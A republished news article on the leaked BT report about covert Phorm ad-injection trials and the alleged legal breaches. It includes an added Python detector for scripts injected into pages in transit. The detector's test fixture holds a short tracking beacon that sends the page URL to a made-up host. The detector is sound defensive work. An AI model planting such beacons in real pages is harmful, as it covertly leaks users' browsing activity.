Wikileaks – Phorm Crashes Browsers, Allegedly Broke the Law 113 Million Times

We have been following the Phorm controversy for some time, and new developments have now emerged.

Note: This is an article I wrote that was published elsewhere first. It has been republished here for archival purposes.

The development is a leaked internal BT report which, on one analysis, suggests that the controversial covert Phorm trials broke the law some 113 million times.

Wikileaks has freshly leaked an internal report which says some very interesting things. Here’s the Wikileaks summary of the report:

The internal British Telecom report shows that the carrier committed at least 18,875,324 allegedly illegal acts of interception and modification during its controversial covert “Phorm” trials.

The report also indicates that personal identifying IP addresses were likely used, despite BT previously assuring the public and ICO that no personally identifiable data was used. IP addresses are recognised by the Data Protection Act.

In addition to the 18 million regular advertising injections or hijackings, it appears charity advertisements were hijacked and replaced with Phorm advertisements.

The report concludes that the “opt-out” system would not work, since BT customers find themselves opted back in every time they changed computers or wiped their cookies.

The report is currently making the rounds on various news sites, including the Open Rights Group, which points to Alexander Hanff’s analysis. Hanff notes the following:

There were a number of things in the report which left me believing that BT had misled ICO (and the public) with regard to the covert trials.

BT have repeatedly stated the trials involved no personally identifiable data and this is one of the points ICO touched on in their letter to one of the victims of the 2007 trials as reported on this web site last week.

However, and this will be obvious to the technically minded although I have not seen anyone mention it to date, if we return to the table on page 45 we have a row called “IP addresses seen through the Proxy Servers” for the same period as above, but again with no data for 24th September due to a technical fault. So it is evident that the PageSense servers (running multiple instances of SQUID proxy server) were in possession of customer IPs; and in fact, due to the way PageSense worked, they needed to have these IPs in order to forward the web page back to the user once it had been grabbed by SQUID.

He then addresses the claim that the trials were trivial: the table on page 45 shows that nearly 19 million tags were inserted into users’ web pages. He then analyses the relevant British law, with specific reference to the following:

– Regulation of Investigatory Powers Act 2000
– Privacy and Electronic Communications (EC Directive) Regulations 2003
– Computer Misuse Act 1990
– Torts (Interference with Goods) Act 1977
– Copyright, Designs and Patents Act 1988 (see derivative works)
– Data Protection Act 1998 (under which, Hanff argues, IP addresses count as personal data)

He then tallies up the total number of “highly probable” law infractions and arrives at a total of 113,252,124.

“still think that looks trivial?” asks Hanff, “And that is just in 8 days.”

Hanff isn’t the only one who took notice of these developments. Ryan Singel of Wired’s Threat Level blog covered them as well, and finds that the Phorm technology also caused web browser instability:

Those boxes inserted JavaScript code into every web page downloaded by the users. That script then reported back to Phorm the contents of the web page, which Phorm used to create ad profiles of a user. Additionally, Phorm purchased advertising space on prominent web sites, showing a default ad for a charity. But when a user who had previously looked at car sites visited one of those pages, he instead got an advertisement for car insurance.

The users were not informed they were being made guinea pigs for a new revenue system for BT and had no way to opt out of the system, according to the report. The JavaScript caused flickering problems for some users as the script reported back information about the content of the web page to a Phorm server. The script also crashed browsers that loaded a website that relied excessively on anchor tags. Additionally, the rogue JavaScript showed up unexpectedly in users’ posts to some web forums.

Despite these problems, the technical assessment concluded the test was successful and largely went unnoticed by most users.
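The mechanism Singel describes, a proxy that rewrites every HTTP response to add a script, leaves a fingerprint a site owner or user can look for: the page the browser received contains script elements the origin never served. The following is an added example, not code from the BT report, from Phorm or from the original article. It compares a reference copy of a page with the copy received over the ISP link and lists the scripts that exist only in the received copy; the sample pages are constructed for the example, the tag host tag.example.net is made up, and it assumes the reference copy was obtained outside the intercepting path (for instance over HTTPS, or from a connection on a different network).

```python
"""Spot <script> elements injected into an HTML page in transit.

Added example, not from the BT/Phorm report or the original article. It
compares the scripts in a reference copy of a page (obtained outside the
intercepting path, e.g. over HTTPS) with the copy a browser received over
the ISP link, and reports scripts present only in the received copy.
The sample pages and the tag host tag.example.net are constructed here.
"""
from dataclasses import dataclass
from html.parser import HTMLParser
from typing import List, Optional
from urllib.parse import urlsplit


@dataclass(frozen=True)
class Script:
    src: Optional[str]  # URL of an external script, None for inline
    body: str           # inline source (whitespace-stripped), "" if external


class ScriptCollector(HTMLParser):
    """Records every <script> element in document order."""

    def __init__(self) -> None:
        super().__init__()
        self.scripts: List[Script] = []
        self._src: Optional[str] = None
        self._buf: Optional[List[str]] = None  # non-None while inside <script>

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._src = dict(attrs).get("src")
            self._buf = []

    def handle_data(self, data):
        # html.parser delivers <script> content as raw data (CDATA), so the
        # inline source arrives here unmodified.
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.scripts.append(Script(self._src, "".join(self._buf).strip()))
            self._src, self._buf = None, None


def collect_scripts(html: str) -> List[Script]:
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    return parser.scripts


def injected_scripts(reference_html: str, received_html: str) -> List[Script]:
    """Scripts in the received page that the reference page never contained."""
    known = set(collect_scripts(reference_html))
    return [s for s in collect_scripts(received_html) if s not in known]


def foreign_script_hosts(scripts: List[Script], page_host: str) -> List[str]:
    """Hosts that external scripts load from, other than the page's own host."""
    hosts = set()
    for s in scripts:
        host = urlsplit(s.src).hostname if s.src else None
        if host and host != page_host:
            hosts.add(host)
    return sorted(hosts)


# Constructed sample: the page as the origin served it ...
REFERENCE = """<html><head><title>News</title>
<script src="https://www.example.org/js/site.js"></script>
</head><body><p>Hello</p>
<script>var pageId = 42;</script>
</body></html>"""

# ... and as a browser behind an injecting proxy received it (constructed;
# tag.example.net is a made-up tag host, not a real Phorm endpoint).
INJECTED = (
    '<script src="http://tag.example.net/tag.js"></script>\n'
    '<script>(function(){var i=new Image();'
    'i.src="http://tag.example.net/c?u="+encodeURIComponent(location.href);})();</script>\n'
)
RECEIVED = REFERENCE.replace("<body>", "<body>" + INJECTED, 1)


if __name__ == "__main__":
    extra = injected_scripts(REFERENCE, RECEIVED)
    for s in extra:
        print("injected:", s.src or ("inline: " + s.body[:60]))
    print("foreign hosts:", foreign_script_hosts(extra, "www.example.org"))
```

Run against the constructed pages, it reports the two injected scripts and tag.example.net as the only foreign host. Two caveats apply in practice: the reference copy must really come from outside the intercepting path, since a proxy that can rewrite both copies defeats the comparison; and pages that legitimately vary their inline scripts per request (nonces, timestamps, CSRF tokens) will produce noise in the inline comparison, which is why the external-host check is the more robust signal.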

Think all of this is just an issue for British users and not for U.S. users? Think again. The piece also points to an earlier report that a company called NebuAd was attempting to do similar things in the US with the ISP Charter, only to be asked to stop by Massachusetts Democrat Edward Markey and Texas Republican Joe Barton, who said it would be a violation of the Communications Act. Wired obtained a copy of the letter, published as a PDF. There is no word yet on what the next move by NebuAd or Charter will be.

It’s interesting to note the similarity to another major incident: first secrecy, then covert implementation (in this case labelled “trials”), then discovery by advocates that laws were being broken. That sequence will sound familiar to anyone who followed the Sony rootkit fiasco. Looked at from that angle, there may be a happy ending for consumers here as well; one can only hope the same will be said for those facing JavaScript-injecting technology deployed for the purpose of pushing ads.

Drew Wilson on Twitter: @icecube85 and Google+.
